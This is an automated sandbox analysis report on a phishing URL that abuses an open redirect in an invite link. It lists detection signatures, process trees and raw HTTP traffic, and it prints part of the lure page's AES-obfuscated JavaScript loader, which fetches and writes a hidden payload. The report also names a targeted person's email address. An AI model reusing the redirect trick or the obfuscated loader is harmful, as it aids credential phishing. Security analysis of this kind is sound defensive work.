Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://lumen.backerkit.com/invites/mAqpu6B5ZtIAsrg4a5WdGA/confirm?redirect_path=//rahul-garg-lcatterton-com.athuselevadores.com.br

Overview

General Information

Sample URL:https://lumen.backerkit.com/invites/mAqpu6B5ZtIAsrg4a5WdGA/confirm?redirect_path=//rahul-garg-lcatterton-com.athuselevadores.com.br
Analysis ID:1544727
Infos:

Detection

HTMLPhisher
Score:52
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected HtmlPhish70
AI detected suspicious URL
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Detected non-DNS traffic on DNS port
HTML page contains hidden javascript code
Sample execution stops while process was sleeping (likely an evasion)
Stores files to the Windows start menu directory
Uses Javascript AES encryption / decryption (likely to hide suspicious Javascript code)

Classification

  • System is w10x64_ra
  • chrome.exe (PID: 1696 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 6672 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2064 --field-trial-handle=1988,i,5379668934890043754,15086957964497128916,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6328 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://lumen.backerkit.com/invites/mAqpu6B5ZtIAsrg4a5WdGA/confirm?redirect_path=//rahul-garg-lcatterton-com.athuselevadores.com.br" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • MpCmdRun.exe (PID: 8000 cmdline: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable MD5: B3676839B2EE96983F9ED735CD044159)
      • conhost.exe (PID: 8008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
dropped/chromecache_67JoeSecurity_HtmlPhish_70Yara detected HtmlPhish_70Joe Security
    SourceRuleDescriptionAuthorStrings
    1.0.pages.csvJoeSecurity_HtmlPhish_70Yara detected HtmlPhish_70Joe Security
      1.2.pages.csvJoeSecurity_HtmlPhish_70Yara detected HtmlPhish_70Joe Security
        No Sigma rule has matched
        No Suricata rule has matched

        Click to jump to signature section

        Show All Signature Results

        Phishing

        barindex
        Source: Yara matchFile source: 1.0.pages.csv, type: HTML
        Source: Yara matchFile source: 1.2.pages.csv, type: HTML
        Source: Yara matchFile source: dropped/chromecache_67, type: DROPPED
        Source: https://ax3si7hub1rr.objectstorage.ap-singapore-2.oci.customer-oci.com/n/ax3si7hub1rr/b/bucket-20241028-2012/o/index.html#9rahul@garg.lcatterton.comHTTP Parser: Base64 decoded: {"a":"4r44AO6SyL4PxCmGezmzU7giJesBBed6wRpkK520F8E=","c":"886ce301857041b056a5391443c33ff2","b":"801bf57ec967a8c24269df878455a1784b7e0853e1721e6733300693878a7926ff87440863c94adf1eb0abe5611eb34b77f227adf7fc030159385ddf8668e725252cf4230cb26c11fa79ed498ad2e4d...
        Source: https://ax3si7hub1rr.objectstorage.ap-singapore-2.oci.customer-oci.com/n/ax3si7hub1rr/b/bucket-20241028-2012/o/index.html#9rahul@garg.lcatterton.comHTTP Parser: asyncfunctionzither(factitious) { var {a,b,c,d}=json.parse(factitious);return cryptojs.aes.decrypt(a, cryptojs.pbkdf2(cryptojs.enc.hex.parse(d), cryptojs.enc.hex.parse(b), {hasher: cryptojs.algo.sha512, keysize: 64/8, iterations:999}),{iv: cryptojs.enc.hex.parse(c)}).tostring(cryptojs.enc.utf8);}asyncfunction caddishness() {document.write(await zither(await (await fetch(await zither(atob(`eyjhijoinhi0nefpnln5tdrqeentr2v6bxpvn2dpsmvzqkjlzdz3unbrszuymey4rt0ilcjjijoiodg2y2uzmde4ntcwndfimdu2ytuzote0ndnjmznmzjiilcjiijoiodaxymy1n2vjoty3ythjmjqynjlkzjg3odq1nwexnzg0yjdlmdg1m2uxnzixzty3mzmzmda2otm4nzhhnzkynmzmodc0nda4njnjotrhzgyxzwiwywjlntyxmwvimzrinzdmmji3ywrmn2zjmdmwmtu5mzg1zgrmody2ogu3mjuyntjjzjqymzbjyji2yzexzme3owvkndk4ywqyztrkotgxntzlowy1mjqyy2nkzgu5ogqxzjcymdbimgvlzdgynwrhm2uwzwixzgzhoge3ztlhmdkwzdllotrlzdyymjk4ytq1mzm1y2qxmwm0ymm5ywvkmdhhzduxnznmm2fkowuxzjaxzjy4oduwm2zjm2jhogmynzfkztuzmtg1m2flzjmwnzvlotk4ytrimgyzyzq1ztixodnlmgmwn2e2zmywntmyyjm1ymjim2zlztczmdq0zwm...
        Source: https://ax3si7hub1rr.objectstorage.ap-singapore-2.oci.customer-oci.com/n/ax3si7hub1rr/b/bucket-20241028-2012/o/index.html#9rahul@garg.lcatterton.comHTTP Parser: No favicon
        Source: https://ax3si7hub1rr.objectstorage.ap-singapore-2.oci.customer-oci.com/n/ax3si7hub1rr/b/bucket-20241028-2012/o/index.html#9rahul@garg.lcatterton.comHTTP Parser: No favicon
        Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49713 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49717 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.16:49727 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 20.242.39.171:443 -> 192.168.2.16:49265 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.16:49266 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.16:49267 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.16:49269 version: TLS 1.2
        Source: global trafficTCP traffic: 192.168.2.16:49264 -> 162.159.36.2:53
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
        Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
        Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
        Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
        Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
        Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
        Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
        Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
        Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
        Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
        Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
        Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
        Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
        Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
        Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
        Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
        Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
        Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
        Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
        Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
        Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
        Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
        Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
        Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
        Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
        Source: global trafficHTTP traffic detected: GET /invites/mAqpu6B5ZtIAsrg4a5WdGA/confirm?redirect_path=//rahul-garg-lcatterton-com.athuselevadores.com.br HTTP/1.1Host: lumen.backerkit.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: rahul-garg-lcatterton-com.athuselevadores.com.brConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /n/ax3si7hub1rr/b/bucket-20241028-2012/o/index.html HTTP/1.1Host: ax3si7hub1rr.objectstorage.ap-singapore-2.oci.customer-oci.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.0.0/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://ax3si7hub1rr.objectstorage.ap-singapore-2.oci.customer-oci.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /turnstile/v0/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://ax3si7hub1rr.objectstorage.ap-singapore-2.oci.customer-oci.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /turnstile/v0/g/f2bbd6738e15/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://ax3si7hub1rr.objectstorage.ap-singapore-2.oci.customer-oci.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.0.0/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /turnstile/v0/g/f2bbd6738e15/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/s78r3/0x4AAAAAAAhNeI7hVTjvzoX5/auto/fbE/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://ax3si7hub1rr.objectstorage.ap-singapore-2.oci.customer-oci.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8da452d5f8116bbc&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/s78r3/0x4AAAAAAAhNeI7hVTjvzoX5/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
        Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/s78r3/0x4AAAAAAAhNeI7hVTjvzoX5/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8da452d5f8116bbc&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: ax3si7hub1rr.objectstorage.ap-singapore-2.oci.customer-oci.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ax3si7hub1rr.objectstorage.ap-singapore-2.oci.customer-oci.com/n/ax3si7hub1rr/b/bucket-20241028-2012/o/index.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=vkpk6RKulBtWzZ8&MD=S66ulWUE HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
        Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/602828571:1730216247:hU1JVbyKijtdUyJpcPx_11H0qSWFqnmCkoLtpOk75jI/8da452d5f8116bbc/Y4JbOerefBrl_xn27RO.r1PJgKAyhh88MgRHz4pkaHg-1730217050-1.1.1.1-hZ4u92QJ8.qahDCTU7tcTZODizOTEhVvtOWCRf7Vi9oLDra6izqze2UIynKjFRXc HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/pat/8da452d5f8116bbc/1730217053319/3a7453e024aa7751b589715d75a71c9ff23b8f410ff13e8e84dec337084828f4/8EZUA_4eRzju1Q0 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/s78r3/0x4AAAAAAAhNeI7hVTjvzoX5/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/i/8da452d5f8116bbc/1730217053320/7BL7LlnT3QR8G8z HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/s78r3/0x4AAAAAAAhNeI7hVTjvzoX5/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/i/8da452d5f8116bbc/1730217053320/7BL7LlnT3QR8G8z HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/602828571:1730216247:hU1JVbyKijtdUyJpcPx_11H0qSWFqnmCkoLtpOk75jI/8da452d5f8116bbc/Y4JbOerefBrl_xn27RO.r1PJgKAyhh88MgRHz4pkaHg-1730217050-1.1.1.1-hZ4u92QJ8.qahDCTU7tcTZODizOTEhVvtOWCRf7Vi9oLDra6izqze2UIynKjFRXc HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /clientwebservice/ping HTTP/1.1Connection: Keep-AliveUser-Agent: DNS resiliency checker/1.0Host: fe3cr.delivery.mp.microsoft.com
        Source: global trafficHTTP traffic detected: GET /sls/ping HTTP/1.1Connection: Keep-AliveUser-Agent: DNS resiliency checker/1.0Host: slscr.update.microsoft.com
        Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=vkpk6RKulBtWzZ8&MD=S66ulWUE HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
        Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=vkpk6RKulBtWzZ8&MD=S66ulWUE HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
        Source: global trafficHTTP traffic detected: GET // HTTP/1.1Host: axelkirchhoffh.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ajax/libs/font-awesome/6.5.0/webfonts/fa-solid-900.woff2 HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ax3si7hub1rr.objectstorage.ap-singapore-2.oci.customer-oci.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.0/css/all.min.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ajax/libs/font-awesome/6.5.0/webfonts/fa-brands-400.woff2 HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ax3si7hub1rr.objectstorage.ap-singapore-2.oci.customer-oci.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.0/css/all.min.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET // HTTP/1.1Host: axelkirchhoffh.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://ax3si7hub1rr.objectstorage.ap-singapore-2.oci.customer-oci.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
